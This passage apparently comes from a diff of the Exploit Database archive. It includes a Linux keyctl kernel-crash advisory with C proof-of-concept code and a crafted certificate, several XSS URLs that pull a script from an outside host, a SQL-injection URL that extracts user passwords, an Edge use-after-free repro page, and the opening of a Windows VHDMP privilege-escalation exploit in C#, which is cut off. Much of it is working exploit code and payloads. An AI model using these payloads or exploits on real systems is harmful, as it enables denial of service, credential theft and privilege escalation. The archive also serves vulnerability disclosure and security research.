OS-S Security Advisory 2016-21
Local DoS: Linux Kernel Nullpointer Dereference via keyctl
Date:
October 31th, 2016
Authors:
Sergej Schumilo, Ralf Spenneberg, Hendrik Schwartke
CVE:
Not yet assigned
CVSS:
4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Severity:
Potentially critical. If the kernel is compiled with the option
Panic-On-Oops, this vulnerability may lead to a kernel panic.
Ease of Exploitation:
Trivial
Vulnerability Type:
Local unprivileged kernel nullpointer dereference
Abstract:
A malicious interaction with the keyctl usermode interface allows an
attacker to crash the kernel. Processing the attached certificate by the
kernel leads to a kernel nullpointer dereference. This vulnerably can be
triggered by any unprivileged user locally.
Detailed product description:
We have verified the bug on the following kernel builds:
Ubuntu Server 16.10 (GNU/Linux 4.8.0-22-generic x86_64)
RedHat Kernel 3.10.0-327.18.2.el7.x86_64
Vendor Communication:
We contacted RedHat on June, 06th 2016.
To this day, no security patch was provided by the vendor.
We publish this Security Advisory in accordance with our responsible
disclosure policy.
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=1343162
Proof of Concept:
As a proof of concept, we are providing a sample exploit program and the
associated certificate.
Severity and Ease of Exploitation:
The vulnerability can be easily exploited by an unprivileged user using
our proof of concept.
dmesg-Report:
[ 40.067569] BUG: unable to handle kernel NULL pointer dereference at
(null)
[ 40.068251] IP: [<ffffffff81341911>] mpi_powm+0x31/0x9b0
[ 40.068710] PGD c853067 PUD 186bd067 PMD 0
[ 40.069090] Oops: 0002 [#1] KASAN
[ 40.069384] Modules linked in: kafl_vuln_test(OE) ext4(OE)
mbcache(OE) jbd2(OE)
[ 40.070043] CPU: 0 PID: 143 Comm: guest_interface Tainted: G
OE 4.4.0 #158
[ 40.070666] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 40.071533] task: ffff88001864b100 ti: ffff88000c880000 task.ti:
ffff88000c880000
[ 40.072117] RIP: 0010:[<ffffffff81341911>] [<ffffffff81341911>]
mpi_powm+0x31/0x9b0
[ 40.072743] RSP: 0018:ffff88000c887bf0 EFLAGS: 00010246
[ 40.073165] RAX: 0000000000000020 RBX: 0000000000000020 RCX:
ffff8800186b33f0
[ 40.073727] RDX: ffff8800186b3930 RSI: ffff8800186b32a0 RDI:
ffff8800186b37e0
[ 40.074481] RBP: ffff88000c887cc0 R08: ffff880010000c00 R09:
ffffed00030d6700
[ 40.075049] R10: ffffea000061ace0 R11: ffff880010000c08 R12:
0000000000000000
[ 40.075616] R13: ffff8800186b37e0 R14: 0000000000000000 R15:
ffff8800186b32a0
[ 40.076174] FS: 0000000000911880(0063) GS:ffffffff81c2f000(0000)
knlGS:0000000000000000
[ 40.076815] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 40.077266] CR2: 0000000000000000 CR3: 000000000c817000 CR4:
00000000000006f0
[ 40.077850] Stack:
[ 40.078018] 0000000000000001 ffffea0000321000 0000000000000000
ffff8800100026c0
[ 40.078646] ffffffff8118dff6 ffff8800186b37ff ffffffff8118dff6
ffff8800186b37ff
[ 40.079286] 1ffff100030d6700 ffff88000c887c58 ffffffff8118e06e
ffff8800185c95f8
[ 40.079925] Call Trace:
[ 40.080129] [<ffffffff8118dff6>] ? kasan_unpoison_shadow+0x36/0x50
[ 40.080642] [<ffffffff8118dff6>] ? kasan_unpoison_shadow+0x36/0x50
[ 40.081139] [<ffffffff8118e06e>] ? kasan_kmalloc+0x5e/0x70
[ 40.081582] [<ffffffff81342320>] ? mpi_alloc+0x20/0x80
[ 40.082006] [<ffffffff812cee6c>] ? RSA_verify_signature+0x36c/0xf60
[ 40.082512] [<ffffffff812ceec5>] RSA_verify_signature+0x3c5/0xf60
[ 40.083001] [<ffffffff812ceb00>] ? public_key_describe+0x160/0x160
[ 40.083507] [<ffffffff812ce5c5>] public_key_verify_signature+0x785/0xb20
[ 40.084043] [<ffffffff812d5bad>] x509_check_signature+0x9d/0x320
[ 40.084531] [<ffffffff812d6461>] x509_key_preparse+0x631/0x1210
[ 40.085014] [<ffffffff812cbe1a>] ? asymmetric_key_preparse+0x26a/0x530
[ 40.085534] [<ffffffff812cbce7>] asymmetric_key_preparse+0x137/0x530
[ 40.086981] [<ffffffff8126b8fb>] ? key_type_lookup+0x4b/0x80
[ 40.087437] [<ffffffff8126ba67>] key_create_or_update+0x137/0x450
[ 40.087942] [<ffffffff8126d2e7>] SyS_add_key+0x117/0x200
[ 40.088381] [<ffffffff81741d33>] entry_SYSCALL_64_fastpath+0x16/0x75
[ 40.088890] Code: 41 56 41 55 41 54 53 48 81 ec a8 00 00 00 8b 41 04
44 8b 72 04 4c 8b 67 18 85 c0 89 45 a4 0f 84 da 07 00 00 45 85 f6 75 38
89 c3 <49> c7 04 24 01 00 00 00 b8 01 00 00 00 83 fb 01 0f 84 84 01 00
[ 40.091203] RIP [<ffffffff81341911>] mpi_powm+0x31/0x9b0
[ 40.091645] RSP <ffff88000c887bf0>
[ 40.091924] CR2: 0000000000000000
[ 40.092207] ---[ end trace 3d4c5681d47247c7 ]---
[ 40.092566] Kernel panic - not syncing: Fatal exception
[ 40.092968] Kernel Offset: disabled
[ 40.093242] Rebooting in 1 seconds..
Proof of Concept (Code):
*/
/*
*
* base64 -d < certificate.base64 > test.crt
* gcc test.crt -lkeyutils
* ./a.out
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <string.h>
#include <sys/mount.h>
#include <errno.h>
#include <signal.h>
#include <keyutils.h>
int main(){
FILE *infile;
char *buffer;
long numbytes;
key_serial_t key_id;
key_serial_t keyring_id;
infile = fopen("test.crt", "r");
if(infile == NULL)
return 1;
fseek(infile, 0L, SEEK_END);
numbytes = ftell(infile);
fseek(infile, 0L, SEEK_SET);
buffer = (char*)calloc(numbytes, sizeof(char));
if(buffer == NULL)
return 1;
fread(buffer, sizeof(char), numbytes, infile);
fclose(infile);
/* inject fuzzed x509 DER data into asymmetric crypto kernel code */
key_id = add_key("asymmetric", "", buffer, numbytes, 0xfffffffd);
printf("Oops?!\n");
if(key_id != -1){
keyctl_unlink(key_id, 0xfffffffd);
}
free(buffer);
return 0;
}
/*
Proof of Concept (Certificate):
MIID/jCCAuagAwIBAgIQFaxulBmyeUtB9iepwxgPHzANBgkqhkiG9w0BAQsFADCBmDELMAkGA1UE
BhMCVVMxFjAUBgNVBAoTDUdlb1RydXN0IEluYy4xOTA3BgNVBAsTMChjKSAyMDA4IEdlb1RydXN0
IEluYy4gLSBGb3IgYXV0aG9yaXplZCB1c2Ugb25seTE2MDQGA1UEAxMtR2VvVHJ1c3QgUHJpbWFy
eSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIEczMB4XDTA4MDQwMjAwMDAwMFoXDTM3MTIwMTIz
NTk1OVowgZgxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1HZW9UcnVzdCBJbmMuMTkwNwYDVQQLEzAo
YykgMjAwOCBHZW9UcnVzdCBJbmMuIC0gRm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxNjA0BgNVBAMT
LUdlb1RydXN0IFByaW1hcnkgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgLSBHMzCCASIwDQYJKoZI
hvcNAQEBBQADggEPADCCAQgCggEBANziXmJYHTNXOTIz+uvLh4yn1ErdBojqZI4xmKU4kB6Yzy5j
K/BGvESyiaHAKAxJcCGVn2TAppMSAmUmhsalifD614SgcK9PGpc/BkTVyetyEH3kMSj7HGHmKAdE
c5IiaacDiGydY8hS2pgn5whMcD60yRLBxWeDXTPzAxHsatBT4tG6NmCUgLthY2xbF37fQJQeqw3C
IShwiP/WJmxsYAQlTlV+fe+/lEjetx3dcI0FX4ilm/LC7urRQEFtYjgdVgbFA0dRIBn8exALDmKu
dlW/X3e+PkkBUz2YJQN2JFodtNuJ6nnltrM7P7pMKEF/BqxqjsHQ9gUdfeZChuOl1UcCAQAAAaNC
MEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFMR5yo6hTgMdHNxr
2zFblD4/MH8tMA0GCSqGSIb3DQEBCwUAA4IBAQAtxRPPVoB7eni9n64smefv2t+UXglpp+duaIy9
cr5HqQ6XErhK8WTTOd8lNNTBzU6B8A8ExCSzNJbGpqow32hhc9f5joWJ7w5elShKKiePEI4ufIbE
Ap7aDHdlDkQNkv39sxY2+hENHYwOB4lqKVb3cvTdFZx3NWZXqxNT2I7BQMXXExZacse3aQHEerGD
AWh9jUGhlBjBJVz88P6DAod8DQ3PLghcSkANPuyBYeYk28rgDi0Hsj5W3I31QYUHSJsMC8tJP33s
t/3LjWeJGqvtux6jAAgIFyqCXDFdRootD4abdNlF+9RAsXqqaC2Gspki4cErx5z481+oghLrGREt
--
*/

9
platforms/php/webapps/27349.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/16957/info
phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Version 2.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/includes/tellafriend.php?about=game&gamename=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

9
platforms/php/webapps/27350.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/16957/info
phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Version 2.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/admin/loginbox.php?loginstatus=1&login_status=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

9
platforms/php/webapps/27351.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/16957/info
phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Version 2.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/index.php?action=tradelinks&submissionstatus=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

10
platforms/php/webapps/27352.txt
View file

@ -1,10 +0,0 @@
source: http://www.securityfocus.com/bid/16957/info
phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Version 2.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/includes/browse.php?cell_title_background_color=%22%3E%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3\E
http://www.example.com/includes/browse.php?browse_cat_id=1&browse_cat_name=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

9
platforms/php/webapps/27353.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/16957/info
phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Version 2.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/includes/displaygame.php?filetype=1&gamefile=%22%3E%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

7
platforms/php/webapps/27708.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/17624/info
EasyGallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[path]/EasyGallery.php?ordner=XSS

9
platforms/php/webapps/29052.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/21130/info
Bloo is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Version 1.00 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/extensions/googiespell/googlespell_proxy.php?lang=[xss]

7
platforms/php/webapps/31334.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/28096/info
Mitra Informatika Solusindo Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?c=10&p=-7%20union%20select%200,concat(user_name,user_password),null,null,null,null,null,null%20from%20tbl_agen--

182
platforms/windows/dos/40761.html Executable file
View file

@ -0,0 +1,182 @@
<!--
Source: http://blog.skylined.nl/20161115001.html
Synopsis
A specially crafted web-page can cause Microsoft Edge to free memory used for a CAttr­Array object. The code continues to use the data in freed memory block immediately after freeing it. It does not appear that there is enough time between the free and reuse to exploit this issue.
Known affected software and attack vectors
Microsoft Edge 11.0.10240.16384
An attacker would need to get a target user to open a specially crafted web-page. Java­Script is not necessarily required to trigger the issue.
Repro
<x style="
background-image: inherit;
text-decoration: line-through;
height: 0;
width: 0;
top: 0;
left: 0;
right: 0;
bottom: 0;
font: menu;">
Alternatively:
<body id=x style=margin:5 onload=x.style.remove­Property("margin")>
Description
When an element is created and style properties are added, these are stored in a CAttr­Array object. A new CAttr­Array is able to store up to 8 properties. If more properties need to be stored, the code will allocate memory for a larger CAttr­Array and copy the existing properties into this new object before freeing the old memory. The code will then continue to use the freed memory almost immediately. In the first repro, the "font" style property is the ninth property and triggers this issue. In the second repro, the only property of a CAttr­Array is removed, at which point it is freed but no new object is allocated. However, the code follows the same path and also reuses the freed memory.
Exploit
What little investigation I did appears to indicate that there is no way to reallocate the freed memory before its reuse. It is therefore probably not possible to exploit this issue that way. I did not investigate how the freed memory is used by the code exactly, and I did not look into other methods to exploit the issue. I did create a second repro that triggers the issue "on-demand" from Javascript but, as is to be expected, no Javascript is executed between the free and the re-use.
-->
<x id=x style="background-image: inherit;text-decoration: line-through;height: 0;width: 0;top: 0;left: 0;right: 0;bottom: 0;"><script>
window.onload = function () {
// This Po­C attempts to exploit a use-after-free bug in Microsoft Edge
// See http://blog.skylined.nl/20161115001.html for details.
// The CAttr­Array is full, adding another style property will cause Edge to
// allocate a larger CAttr­Array, copy everything and free the old one.
// The old one then continues to be used almost immediately:
x.style.set­Property("font", "menu");
// This work by Sky­Lined is licensed under a Creative Commons
// Attribution-Non-Commercial 4.0 International License.
};
</script>
<!--
The code
Below you can find an annotated disassembly for the CAttr­Array::Destroy function, which calls CAttr­Array::Set (in which the memory is freed) before looping and re-using the memory. This loop shows there is very little time between the two events in which to reallocate the memory and attempt to control its contents. There also does not appear to be much this function can be made to do if the memory could be controlled.
EDGEHTML!CAttr­Array::Destroy:
6175024f 8bff mov edi,edi
61750251 55 push ebp
61750252 8bec mov ebp,esp
61750254 83e4f8 and esp,0FFFFFFF8h
61750257 83ec2c sub esp,2Ch
6175025a 8b510c mov edx,dword ptr [ecx+0Ch]
6175025d 8bc2 mov eax,edx
6175025f 53 push ebx
61750260 d1e8 shr eax,1
61750262 894c240c mov dword ptr [esp+0Ch],ecx
61750266 56 push esi
61750267 57 push edi
61750268 a801 test al,1
6175026a 0f85b56f3600 jne EDGEHTML!CAttr­Array::Destroy+0x366fd6 (61ab7225)
{
61ab7225 cc int 3
61ab7226 e94590c9ff jmp EDGEHTML!CAttr­Array::Destroy+0x21 (61750270)
}
61750270 8b5d08 mov ebx,dword ptr [ebp+8]
61750273 8d7c2428 lea edi,[esp+28h]
61750277 c1e304 shl ebx,4
6175027a 035908 add ebx,dword ptr [ecx+8]
6175027d 8bf3 mov esi,ebx
6175027f 803b04 cmp byte ptr [ebx],4
61750282 a5 movs dword ptr es:[edi],dword ptr [esi]
61750283 a5 movs dword ptr es:[edi],dword ptr [esi]
61750284 a5 movs dword ptr es:[edi],dword ptr [esi]
61750285 a5 movs dword ptr es:[edi],dword ptr [esi]
61750286 752d jne EDGEHTML!CAttr­Array::Destroy+0x66 (617502b5)
{
617502b5 8bcb mov ecx,ebx
617502b7 e870e4ffff call EDGEHTML!CAttr­Value::Get­DISPID (6174e72c)
617502bc 8b742414 mov esi,dword ptr [esp+14h]
617502c0 8bca mov ecx,edx
617502c2 c1e004 shl eax,4
617502c5 83e20f and edx,0Fh
617502c8 2bc8 sub ecx,eax
617502ca 83e1f0 and ecx,0FFFFFFF0h
617502cd 0bca or ecx,edx
617502cf 894e0c mov dword ptr [esi+0Ch],ecx
617502d2 0fb74302 movzx eax,word ptr [ebx+2]
617502d6 a808 test al,8
617502d8 752c jne EDGEHTML!CAttr­Array::Destroy+0xb7 (61750306)
{
617502da 8b560c mov edx,dword ptr [esi+0Ch] ;<--------------.
617502dd f6c208 test dl,8 ; \
617502e0 0f95c1 setne cl ; |
617502e3 f6430201 test byte ptr [ebx+2],1 ; REUSE |
617502e7 0f95c0 setne al ; |
617502ea 84c8 test al,cl ; |
617502ec 8bce mov ecx,esi ; |
617502ee 7498 je EDGEHTML!CAttr­Array::Destroy+0x39 (61750288) ; >----, |
617502f0 b301 mov bl,1 ; | |
617502f2 eb96 jmp EDGEHTML!CAttr­Array::Destroy+0x3b (6175028a) ; >--- | --. |
} ; | | |
61750306 803b09 cmp byte ptr [ebx],9 ; | | /|
61750309 74cf je EDGEHTML!CAttr­Array::Destroy+0x8b (617502da) ; >--- | - | --' |
6175030b 8d442418 lea eax,[esp+18h] ; | | |
6175030f 8bcb mov ecx,ebx ; | | |
61750311 50 push eax ; | | |
61750312 e89efeffff call EDGEHTML!CAttr­Value::Get­As­Variant­NC (617501b5) ; | | |
61750317 0fb74b02 movzx ecx,word ptr [ebx+2] ; | | |
6175031b 81e1efff0000 and ecx,0FFEFh ; | | |
61750321 f6430380 test byte ptr [ebx+3],80h ; | | |
61750325 7526 jne EDGEHTML!CAttr­Array::Destroy+0xfe (6175034d) ; | | |
{ ; | | |
6175034d 33c0 xor eax,eax ; V V ^
6175034f ebd9 jmp EDGEHTML!CAttr­Array::Destroy+0xdb (6175032a) ; | | |
} else { ; | | |
61750327 8b4304 mov eax,dword ptr [ebx+4] ; | | |
} ; | | |
6175032a 6a01 push 1 ; | | |
6175032c 6a01 push 1 ; | | |
6175032e 51 push ecx ; | | |
6175032f 6a09 push 9 ; | | |
61750331 8d4c2428 lea ecx,[esp+28h] ; | | |
61750335 51 push ecx ; | | |
61750336 50 push eax ; | | |
61750337 8bcb mov ecx,ebx ; | | |
61750339 e8eee3ffff call EDGEHTML!CAttr­Value::Get­DISPID (6174e72c) ; | | |
6175033e 50 push eax ; | | |
6175033f 8d44242f lea eax,[esp+2Fh] ; | | |
61750343 8bce mov ecx,esi ; | | |
61750345 50 push eax ; | | |
61750346 e8258a0800 call EDGEHTML!CAttr­Array::Set (617d8d70) ; FREE | | /
6175034b eb8d jmp EDGEHTML!CAttr­Array::Destroy+0x8b (617502da) ; >--- | - | ---'
} ; | |
61750288 33db xor ebx,ebx ;<-----' |
6175028a d1ea shr edx,1 ;<---------'
6175028c f6c201 test dl,1
6175028f 0f85966f3600 jne EDGEHTML!CAttr­Array::Destroy+0x366fdc (61ab722b)
{
61ab722b cc int 3
61ab722c e96490c9ff jmp EDGEHTML!CAttr­Array::Destroy+0x46 (61750295)
}
61750295 ff7508 push dword ptr [ebp+8]
61750298 6a10 push 10h
6175029a e8b1e01400 call EDGEHTML!CImpl­Ary::Delete (6189e350)
6175029f 8d4c2428 lea ecx,[esp+28h]
617502a3 e8ae000000 call EDGEHTML!CAttr­Value::Free (61750356)
617502a8 84db test bl,bl
617502aa 7548 jne EDGEHTML!CAttr­Array::Destroy+0xa5 (617502f4)
{
617502f4 8b4c2414 mov ecx,dword ptr [esp+14h]
617502f8 6a03 push 3
617502fa 68eb030180 push 800103EBh
617502ff e8ac3e0c00 call EDGEHTML!CAttr­Array::Delete­Attribute (618141b0)
61750304 eba6 jmp EDGEHTML!CAttr­Array::Destroy+0x5d (617502ac)
}
617502ac 5f pop edi
617502ad 5e pop esi
617502ae 5b pop ebx
617502af 8be5 mov esp,ebp
617502b1 5d pop ebp
617502b2 c20400 ret 4
Time-line
September 2015: This vulnerability was found through fuzzing.
September 2015: This vulnerability was submitted to ZDI.
September 2015: This vulnerability was rejected by ZDI.
November 2016: The issue no longer reproduces in Microsoft Edge.
November 2016: Details of this issue are released.
-->

52
platforms/windows/dos/40766.txt Executable file
View file

@ -0,0 +1,52 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=874
We have encountered a Windows kernel crash in the nt!RtlEqualSid function invoked through nt!SeAccessCheck by nt!CmpCheckSecurityCellAccess while loading corrupted registry hive files. An example of a crash log excerpt generated after triggering the bug is shown below:
---
PAGE_FAULT_BEYOND_END_OF_ALLOCATION (cd)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: a1f11004, memory referenced
Arg2: 00000000, value 0 = read operation, 1 = write operation
Arg3: 816d40b3, if non-zero, the address which referenced memory.
Arg4: 00000000, Mm internal code.
Debugging Details:
------------------
[...]
STACK_TEXT:
92bbb5e4 816f92b9 a1f11004 83af4ff0 92bbb6ac nt!RtlEqualSid+0x9
92bbb604 816d3292 00000000 20204d43 00000000 nt!RtlpOwnerAcesPresent+0x87
92bbb634 816d3cfe a1f10f50 00000001 00bbb6b0 nt!SeAccessCheckWithHint+0x178
92bbb668 818f8ff8 a1f10f50 92bbb6b0 00000000 nt!SeAccessCheck+0x2a
92bbb6c0 81820906 a75e69c8 000051d8 00000001 nt!CmpCheckSecurityCellAccess+0xe5
92bbb6fc 818206ad 03010001 92bbb728 92bbb718 nt!CmpValidateHiveSecurityDescriptors+0x1bd
92bbb73c 8182308f 03010001 80000588 8000054c nt!CmCheckRegistry+0xd8
92bbb798 817f6fa0 92bbb828 00000002 00000000 nt!CmpInitializeHive+0x55c
92bbb85c 817f7d85 92bbbbb8 00000000 92bbb9f4 nt!CmpInitHiveFromFile+0x1be
92bbb9c0 817ffaae 92bbbbb8 92bbba88 92bbba0c nt!CmpCmdHiveOpen+0x50
92bbbacc 817f83b8 92bbbb90 92bbbbb8 00000010 nt!CmLoadKey+0x459
92bbbc0c 8168edc6 0014f8a4 00000000 00000010 nt!NtLoadKeyEx+0x56c
92bbbc0c 77cc6bf4 0014f8a4 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0014f90c 00000000 00000000 00000000 00000000 0x77cc6bf4
[...]
FOLLOWUP_IP:
nt!RtlEqualSid+9
816d40b3 668b06 mov ax,word ptr [esi]
---
The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for the NT kernel (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation. In order to reproduce the problem with the provided sample, it is necessary to load it with a dedicated program which calls the RegLoadAppKey() API.
3 samples attached with single-byte differences compared to the original file, and the base sample itself.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40766.zip

839
platforms/windows/local/40763.cs Executable file
View file

@ -0,0 +1,839 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=914
Windows: VHDMP Arbitrary File Creation EoP
Platform: Windows 10 10586 and 14393. Unlikely to work on 7 or 8.1 as I think its new functionality
Class: Elevation of Privilege
Summary:
The VHDMP driver doesnt safely create files related to Resilient Change Tracking leading to arbitrary file overwrites under user control leading to EoP.
Description:
The VHDMP driver is used to mount VHD and ISO files so that they can be accessed as a normal mounted volume. In Windows 10 support was introduced for Resilient Change Tracking which adds a few new files ending with .rct and .mrt next to the root vhd. When you enable RCT on an existing VHD it creates the files if theyre not already present. Unfortunately it does it using ZwCreateFile (in VhdmpiCreateFileWithSameSecurity) and doesnt specify the OBJ_FORCE_ACCESS_CHECK flag. As the location is entirely controlled by the user we can exploit this to get an arbitrary file create/overwrite, and the code as its name suggests will copy across the DACL from the parent VHD meaning well always be able to access it.
Note this doesnt need admin rights as we never mount the VHD, just set RCT. However you cant use it in a sandbox as opening the drive goes through multiple access checks.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. Note you must compile as Any CPU or at least the correct bitness for the system under test other setting the dos devices directory has a habit of failing. It will create abc.txt and xyz.txt inside the Windows directory which we normally cant write to.
1) Compile the C# source code file.
2) Execute the poc passing the path
3) It should print that it successfully created a file
Expected Result:
Setting RCT fails.
Observed Result:
The user has created the files \Windows\abc.txt and \Windows\xyz.txt with a valid DACL for the user to modify the files.
*/
using Microsoft.Win32.SafeHandles;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.AccessControl;
using System.Text;
using System.Linq;
namespace DfscTest
{
class Program
{
[Flags]
public enum AttributeFlags : uint
{
None = 0,
Inherit = 0x00000002,
Permanent = 0x00000010,
Exclusive = 0x00000020,
CaseInsensitive = 0x00000040,
OpenIf = 0x00000080,
OpenLink = 0x00000100,
KernelHandle = 0x00000200,
ForceAccessCheck = 0x00000400,
IgnoreImpersonatedDevicemap = 0x00000800,
DontReparse = 0x00001000,
}
public class IoStatus
{
public IntPtr Pointer;
public IntPtr Information;
public IoStatus()
{
}
public IoStatus(IntPtr p, IntPtr i)
{
Pointer = p;
Information = i;
}
}
[Flags]
public enum ShareMode
{
None = 0,
Read = 0x00000001,
Write = 0x00000002,
Delete = 0x00000004,
}
[Flags]
public enum FileOpenOptions
{
None = 0,
DirectoryFile = 0x00000001,
WriteThrough = 0x00000002,
SequentialOnly = 0x00000004,
NoIntermediateBuffering = 0x00000008,
SynchronousIoAlert = 0x00000010,
SynchronousIoNonAlert = 0x00000020,
NonDirectoryFile = 0x00000040,
CreateTreeConnection = 0x00000080,
CompleteIfOplocked = 0x00000100,
NoEaKnowledge = 0x00000200,
OpenRemoteInstance = 0x00000400,
RandomAccess = 0x00000800,
DeleteOnClose = 0x00001000,
OpenByFileId = 0x00002000,
OpenForBackupIntent = 0x00004000,
NoCompression = 0x00008000,
OpenRequiringOplock = 0x00010000,
ReserveOpfilter = 0x00100000,
OpenReparsePoint = 0x00200000,
OpenNoRecall = 0x00400000,
OpenForFreeSpaceQuery = 0x00800000
}
[Flags]
public enum GenericAccessRights : uint
{
None = 0,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000,
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
MaximumAllowed = 0x02000000,
};
[Flags]
enum DirectoryAccessRights : uint
{
Query = 1,
Traverse = 2,
CreateObject = 4,
CreateSubDirectory = 8,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000,
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
MaximumAllowed = 0x02000000,
}
[Flags]
public enum ProcessAccessRights : uint
{
None = 0,
CreateProcess = 0x0080,
CreateThread = 0x0002,
DupHandle = 0x0040,
QueryInformation = 0x0400,
QueryLimitedInformation = 0x1000,
SetInformation = 0x0200,
SetQuota = 0x0100,
SuspendResume = 0x0800,
Terminate = 0x0001,
VmOperation = 0x0008,
VmRead = 0x0010,
VmWrite = 0x0020,
MaximumAllowed = GenericAccessRights.MaximumAllowed
};
[Flags]
public enum FileAccessRights : uint
{
None = 0,
ReadData = 0x0001,
WriteData = 0x0002,
AppendData = 0x0004,
ReadEa = 0x0008,
WriteEa = 0x0010,
Execute = 0x0020,
DeleteChild = 0x0040,
ReadAttributes = 0x0080,
WriteAttributes = 0x0100,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000,
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
MaximumAllowed = 0x02000000,
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public sealed class UnicodeString
{
ushort Length;
ushort MaximumLength;
[MarshalAs(UnmanagedType.LPWStr)]
string Buffer;
public UnicodeString(string str)
{
Length = (ushort)(str.Length * 2);
MaximumLength = (ushort)((str.Length * 2) + 1);
Buffer = str;
}
}
[DllImport("ntdll.dll")]
static extern int NtClose(IntPtr handle);
public sealed class SafeKernelObjectHandle
: SafeHandleZeroOrMinusOneIsInvalid
{
public SafeKernelObjectHandle()
: base(true)
{
}
public SafeKernelObjectHandle(IntPtr handle, bool owns_handle)
: base(owns_handle)
{
SetHandle(handle);
}
protected override bool ReleaseHandle()
{
if (!IsInvalid)
{
NtClose(this.handle);
this.handle = IntPtr.Zero;
return true;
}
return false;
}
}
public enum SecurityImpersonationLevel
{
Anonymous = 0,
Identification = 1,
Impersonation = 2,
Delegation = 3
}
public enum SecurityContextTrackingMode : byte
{
